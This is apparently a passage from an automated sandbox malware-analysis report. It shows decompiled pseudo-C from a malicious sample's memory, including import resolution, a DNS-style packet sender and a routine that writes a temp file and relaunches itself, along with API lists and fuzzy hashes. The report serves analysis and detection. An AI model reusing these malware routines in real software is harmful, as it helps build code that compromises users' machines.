						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}
























                                                                                0x00406071
                                                                                0x00406074
                                                                                0x0040607c
                                                                                0x0040607c
                                                                                0x00406082
                                                                                0x00406087
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x004060a2
                                                                                0x004060a4
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x004061b5
                                                                                0x004060aa
                                                                                0x004060ad
                                                                                0x004060b5
                                                                                0x004060b5
                                                                                0x004060b8
                                                                                0x004060ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004060c3
                                                                                0x004060c9
                                                                                0x004060cc
                                                                                0x004060cf
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x00000000
                                                                                0x004061ae
                                                                                0x004060d5
                                                                                0x004060d5
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060ee
                                                                                0x004060fa
                                                                                0x004060dc
                                                                                0x004060dc
                                                                                0x004060e7
                                                                                0x004060e7
                                                                                0x00406101
                                                                                0x00406104
                                                                                0x00406106
                                                                                0x00000000
                                                                                0x0040610c
                                                                                0x0040610c
                                                                                0x00406112
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611d
                                                                                0x0040612d
                                                                                0x0040612d
                                                                                0x0040612f
                                                                                0x0040611f
                                                                                0x0040611f
                                                                                0x00406127
                                                                                0x00406127
                                                                                0x00406131
                                                                                0x00406133
                                                                                0x00406135
                                                                                0x0040618b
                                                                                0x0040618b
                                                                                0x0040618f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406191
                                                                                0x0040619e
                                                                                0x004061a4
                                                                                0x004061a6
                                                                                0x004060b2
                                                                                0x00000000
                                                                                0x004060b2
                                                                                0x00000000
                                                                                0x00406137
                                                                                0x00406137
                                                                                0x0040613a
                                                                                0x0040613d
                                                                                0x0040613f
                                                                                0x0040613f
                                                                                0x0040615e
                                                                                0x00406164
                                                                                0x00406166
                                                                                0x00406173
                                                                                0x00406173
                                                                                0x00406176
                                                                                0x0040617a
                                                                                0x00406187
                                                                                0x00406187
                                                                                0x00406187
                                                                                0x00000000
                                                                                0x00406187
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406168
                                                                                0x0040616b
                                                                                0x0040616e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406170
                                                                                0x00406170
                                                                                0x00000000
                                                                                0x00406170
                                                                                0x0040614a
                                                                                0x00406150
                                                                                0x00000000
                                                                                0x0040617c
                                                                                0x0040617c
                                                                                0x0040617f
                                                                                0x00406181
                                                                                0x00406181
                                                                                0x00000000
                                                                                0x00406185
                                                                                0x00406135
                                                                                0x00406106
                                                                                0x00000000
                                                                                0x004060b5
                                                                                0x00000000

                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Read$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2438460464-0
                                                                                • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402923 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}




























                                                                                0x00402923
                                                                                0x00402931
                                                                                0x00402932
                                                                                0x00402935
                                                                                0x0040293b
                                                                                0x00402950
                                                                                0x00402957
                                                                                0x0040296a
                                                                                0x0040296e
                                                                                0x00402970
                                                                                0x00402973
                                                                                0x00402978
                                                                                0x00402a5b
                                                                                0x00402a5b
                                                                                0x00402a5e
                                                                                0x00000000
                                                                                0x00402a5e
                                                                                0x0040297e
                                                                                0x00402995
                                                                                0x004029ac
                                                                                0x004029ae
                                                                                0x004029b1
                                                                                0x004029b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004029c1
                                                                                0x004029ca
                                                                                0x004029d6
                                                                                0x004029e0
                                                                                0x004029e2
                                                                                0x004029e6
                                                                                0x004029ee
                                                                                0x004029f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a0a
                                                                                0x00402a0e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a18
                                                                                0x00402a2a
                                                                                0x00402a33
                                                                                0x00402a36
                                                                                0x00402a38
                                                                                0x00402a3b
                                                                                0x00402a3e
                                                                                0x00402a43
                                                                                0x00402a4a
                                                                                0x00402a45
                                                                                0x00402a45
                                                                                0x00402a45
                                                                                0x00402a4c
                                                                                0x00402a55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a55
                                                                                0x00000000
                                                                                0x0040297e
                                                                                0x00402959
                                                                                0x00000000
                                                                                0x00402959
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E654 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x74cb43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}















                                                                                0x0040e65a
                                                                                0x0040e664
                                                                                0x0040e666
                                                                                0x0040e66c
                                                                                0x0040e6a9
                                                                                0x0040e6b0
                                                                                0x0040e6b5
                                                                                0x0040e6c8
                                                                                0x0040e6d0
                                                                                0x0040e6d3
                                                                                0x0040e6d8
                                                                                0x0040e6de
                                                                                0x0040e6f5
                                                                                0x0040e6e0
                                                                                0x0040e6e5
                                                                                0x0040e6e9
                                                                                0x0040e6ef
                                                                                0x0040e6ef
                                                                                0x0040e6f9
                                                                                0x0040e6f9
                                                                                0x0040e6fe
                                                                                0x0040e704
                                                                                0x0040e741
                                                                                0x0040e743
                                                                                0x0040e6b9
                                                                                0x0040e6b9
                                                                                0x0040e6c4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e706
                                                                                0x0040e706
                                                                                0x0040e706
                                                                                0x0040e709
                                                                                0x0040e70b
                                                                                0x0040e70e
                                                                                0x0040e715
                                                                                0x0040e715
                                                                                0x0040e715
                                                                                0x0040e718
                                                                                0x0040e71b
                                                                                0x0040e72c
                                                                                0x0040e72c
                                                                                0x0040e72c
                                                                                0x0040e732
                                                                                0x00000000
                                                                                0x0040e736
                                                                                0x0040e722
                                                                                0x0040e728
                                                                                0x0040e72a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e72a
                                                                                0x0040e710
                                                                                0x0040e713
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e737
                                                                                0x0040e737
                                                                                0x0040e739
                                                                                0x0040e739
                                                                                0x00000000
                                                                                0x0040e706
                                                                                0x0040e6b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e66e
                                                                                0x0040e66e
                                                                                0x0040e66e
                                                                                0x0040e676
                                                                                0x0040e684
                                                                                0x0040e68f
                                                                                0x0040e699
                                                                                0x0040e686
                                                                                0x0040e686
                                                                                0x0040e686
                                                                                0x0040e69b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e69b
                                                                                0x0040e69d
                                                                                0x0040e69d
                                                                                0x0040e69f
                                                                                0x0040e6a1
                                                                                0x0040e6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                • lstrcmpA.KERNEL32(74CB43E8,00000000,?,74CB43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,74CB43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                • lstrcmpA.KERNEL32(?,00000008,?,74CB43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                • String ID: A$ A
                                                                                • API String ID: 3343386518-686259309
                                                                                • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004026FF Relevance: 7.6, APIs: 5, Instructions: 96networkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400);
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

























                                                                                0x00402704
                                                                                0x00402706
                                                                                0x0040270b
                                                                                0x00402715
                                                                                0x00402718
                                                                                0x0040271d
                                                                                0x0040271e
                                                                                0x0040271e
                                                                                0x00402726
                                                                                0x0040272e
                                                                                0x00402734
                                                                                0x0040273a
                                                                                0x00402740
                                                                                0x00402743
                                                                                0x0040274e
                                                                                0x00402752
                                                                                0x00402754
                                                                                0x0040275a
                                                                                0x0040275e
                                                                                0x00402764
                                                                                0x00402766
                                                                                0x0040276a
                                                                                0x00402770
                                                                                0x00402774
                                                                                0x0040277a
                                                                                0x0040277e
                                                                                0x00402784
                                                                                0x00402788
                                                                                0x0040278a
                                                                                0x0040278a
                                                                                0x0040278d
                                                                                0x004027a0
                                                                                0x00402795
                                                                                0x00402797
                                                                                0x0040279d
                                                                                0x00000000
                                                                                0x0040279d
                                                                                0x00000000
                                                                                0x00402795
                                                                                0x004027a9
                                                                                0x004027ad
                                                                                0x004027b9
                                                                                0x004027b3
                                                                                0x004027b7
                                                                                0x004027b8
                                                                                0x004027b8
                                                                                0x004027c2
                                                                                0x004027c4
                                                                                0x004027c4
                                                                                0x004027c5
                                                                                0x004027c7
                                                                                0x0040278a
                                                                                0x004027ce
                                                                                0x004027d2
                                                                                0x004027d2
                                                                                0x004027d5
                                                                                0x004027d7
                                                                                0x004027df
                                                                                0x004027e3
                                                                                0x004027e5
                                                                                0x004027f0
                                                                                0x00402802
                                                                                0x00402815

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040272E
                                                                                • htons.WS2_32(00000001), ref: 00402752
                                                                                • htons.WS2_32(0000000F), ref: 004027D5
                                                                                • htons.WS2_32(00000001), ref: 004027E3
                                                                                • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                  • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                  • Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htons$Heap$AllocCountProcessTicksendto
                                                                                • String ID:
                                                                                • API String ID: 1802437671-0
                                                                                • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F26D Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: setsockopt
                                                                                • String ID:
                                                                                • API String ID: 3981526788-0
                                                                                • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E393AC Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00E393C6
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00E393CD
                                                                                • CharToOemA.USER32(?,?), ref: 00E393DB
                                                                                • wsprintfA.USER32 ref: 00E39410
                                                                                  • Part of subcall function 00E392CB: GetTempPathA.KERNEL32(00000400,?), ref: 00E392E2
                                                                                  • Part of subcall function 00E392CB: wsprintfA.USER32 ref: 00E39350
                                                                                  • Part of subcall function 00E392CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00E39375
                                                                                  • Part of subcall function 00E392CB: lstrlen.KERNEL32(?,?,00000000), ref: 00E39389
                                                                                  • Part of subcall function 00E392CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 00E39394
                                                                                  • Part of subcall function 00E392CB: CloseHandle.KERNEL32(00000000), ref: 00E3939B
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00E39448
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 3857584221-0
                                                                                • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction ID: 4385a8cf4556de4345414052e6a535112591dbbf9e280d04990f9bf2c48a0c61
                                                                                • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction Fuzzy Hash: E0018CF69001187BDB20A7619D8DEDF3ABCDB85701F0000A2BB49E2080EAB49AC5CF75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409145 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}









                                                                                0x00409145
                                                                                0x00409166
                                                                                0x00409174
                                                                                0x0040917a
                                                                                0x00409180
                                                                                0x00409181
                                                                                0x004091a9
                                                                                0x004091b6
                                                                                0x004091c9
                                                                                0x004091d3
                                                                                0x00000000
                                                                                0x004091e1
                                                                                0x004091ea

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                • CharToOemA.USER32 ref: 00409174
                                                                                • wsprintfA.USER32 ref: 004091A9
                                                                                  • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                  • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                  • Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
